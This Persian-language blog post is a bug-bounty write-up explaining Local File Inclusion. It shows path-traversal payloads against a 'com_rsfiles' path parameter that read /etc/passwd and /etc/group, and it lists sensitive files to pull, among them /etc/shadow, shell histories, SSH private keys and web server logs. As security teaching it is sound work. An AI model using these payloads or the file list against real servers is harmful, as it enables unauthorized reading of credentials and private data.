• صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
 

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت
  • صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
0

هنوز هیچ محصولی خریداری نکرده اید.

وبلاگ

مرزبان بلاگ رایتاپ رایتاپ Lfi شماره 1

رایتاپ Lfi شماره 1

رایتاپ
ارسال شده توسط بهروز منصوری
1402/08/29
182 بازدید

سلام.من بهروز منصوری هستم و قراره در رایتاپ Lfi شماره 1 در مورد این موضوع صحبت کنیم که این آسیب پذیری چیست و می تواند باعث ایجاد چه خطراتی شود.

LFI یا Local File Inclusion نوعی آسیب پذیری وب است که می تواند تأثیرات قابل توجهی بر امنیت وب داشته باشد

این آسیب پذیری زمانی اتفاق می افتد که یک برنامه وب به مهاجم اجازه می دهد تا فایل ها را از طریق مرورگر روی سرور قرار دهد.

مثال ها:

www.target.com/search=/../../../../etc/passwd

www.target.com/search=//..//..//..//..//etc/passwd

www.target.com/?option=com_rsfiles&task=files.display&path=/////etc/passwd

هکر می‌تواند ورودی را برای بارگیری فایل‌های دلخواه، از جمله فایل‌های حساس سیستم و فایل‌های پیکربندی دستکاری کند.

آسیب پذیری های LFI ممکن است منجر به دسترسی غیرمجاز به فایل های حساس شوند.

آسیب‌پذیری‌های LFI هنگامی که مورد سوء استفاده قرار می‌گیرند، به مهاجمان اجازه می‌دهند:

  • دسترسی به اطلاعات حساس: مهاجمان می‌توانند به فایل‌های سیستم، کد منبع برنامه و فایل‌های پیکربندی دسترسی داشته باشند که ممکن است حاوی اطلاعات مهمی مانند رمز عبور، کلیدهای API یا داده‌های کاربر باشد.
  • اجرای کد دلخواه: در برخی موارد، LFI می تواند منجر به اجرای کد از راه دور شود و به مهاجمان این امکان را می دهد که کدهای مخرب را روی سرور اجرا کنند.
  • دور زدن کنترل‌های امنیتی: LFI می‌تواند مکانیسم‌های امنیتی را دور بزند و به دایرکتوری‌های محدود شده دسترسی پیدا کند.
  • افشای اطلاعات: داده‌های کاربر، گزارش‌ها و سایر اطلاعات محرمانه ممکن است افشا شوند که منجر به نقض حریم خصوصی می‌شود.

برای جلوگیری از آسیب‌پذیری‌ LFI، توسعه‌دهندگان وب باید ورودی‌های کاربر را با دقت تأیید و پاکسازی کنند و از استفاده از داده‌های کنترل‌شده توسط کاربر هنگام تعیین مسیرهای فایل اجتناب کنند.

شروع فرایند تست نفوذ

برای شروع من از این ابزارها و دستورات استفاده کردم:

رایتاپ Lfi شماره 1

رایتاپ Lfi شماره 1

رایتاپ Lfi شماره 1
پس از بازبینی کوتاه و آزمایش دامنه هایم با استفاده از httpx، پارامتری را پیدا کردم که جالب به نظر می رسید.

?option=com_rsfiles&task=files.display&path=

من دستور اولیه Lfi را امتحان کردم:

/////////////../../../../etc/group

رایتاپ Lfi شماره 1

 

/////////////////////////////////////////////../etc/passwd

رایتاپ Lfi شماره 1

نکته مهم: هنگام جستجوی این نوع آسیب پذیری ها، سعی کنید فایل های حساس را بازیابی کنید.

در زیر می توانید مسیرهای فایل های مهم را پیدا کنید.

فایل های حساس:

/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile

WEB SERVERS

# Usually found in the root of the website /root/
.htaccess
config.php

SHH

authorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts

 

LOGS

/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log

رایتاپ Lfi شماره 1 اواین رایتاپ در زمینه Lfi است اما در آینده رایتاپ های بیشتری در مورد این آیب پذیری منتشر خواهم کرد.

اگر به هک و امنیت و باگ بانتی علاقه دارید پیشنهاد میکنم دوره کلوپ امنیت ۱ و کلوپ امنیت پیشرفه رو از دست ندید.

برچسب ها: etc/passwdlfilocal file inclusionlogsowasppentestsshwriteupآسیب پذیریباگ بانتیباگ هانترباگ هانتینگبرنامه نویسیرایتاپکلوپ امنیتکلیدهای APIهکر

قدیمی تر رایتاپ Business Logic دستکاری Qr code
جدیدتر رایتاپ Host Header Injection شماره 1

محصولات فروش ویژه
  • چطور با گزارش خوب در سایت‌های داخلی کسب درآمد کنیم؟
    کسب درآمد از طریق گزارش باگ در سایت‌های داخلی
  • دوره درک عمیق آسیب‌پذیری
    درک عمیق آسیب‌پذیری
  • مینی دوره مهندسی اجتماعی
    مینی دوره مهندسی اجتماعی
  • گزارش نویسی حرفه ای در باگ هانتینگ
    گزارش نویسی حرفه‌ای در Bug Hunting
دسته‌ها
  • رایتاپ
  • غیر رسمی
  • مقالات آموزشی
  • وبلاگ
  • ویدیوهای آموزشی
درباره ما

هدف از راه‌اندازی این سایت تلاش در جهت ورود شما به بازار کار است.افراد زیادی را میشناسیم که مشغول کارهای کارمندی هستند، شاید حتی پول نسبتا خوبی هم به دست میاورند ولی از کارشان لذت نمیبرند.

هدف ما اینجا این است که شما از کاری که علاقه‌ دارید و از انجام دادنش لذت می‌برید به صورت قانونی پول در بیاورید و نکته مهم اینجاست که حوزه هک و امنیت یک حوزه پولساز است به شرط این که راه درست را انتخاب کنید و از مسیر درست به دنبال نتیجه گرفتن باشید.

دسترسی سریع
  • دوره منتورینگ vip بهروز منصوری
  • کلوپ امنیت 1
  • کلوپ امنیت 2
  • کلوپ امنیت پیشرفته
  • دوره تست نفوذ api
  • دوره جامع اوسینت
  • دوره امنیت وردپرس
  • دوره متخصص pentest
  • رایتاپخونه
  • ارتباط با ما
  • تماس: 09126216410
  • ایمیل: mr.mansoori@yahoo.com

تمامی حقوق برای مرزبان محفوظ می باشد.

طراحی توسط مرزبان

در صورت نیاز به مشاوره می توانید فرم را تکمیل نمایید و یا با ما در ارتباط باشید.

جستجو

جستجو با زدن Enter و بستن با زدن ESC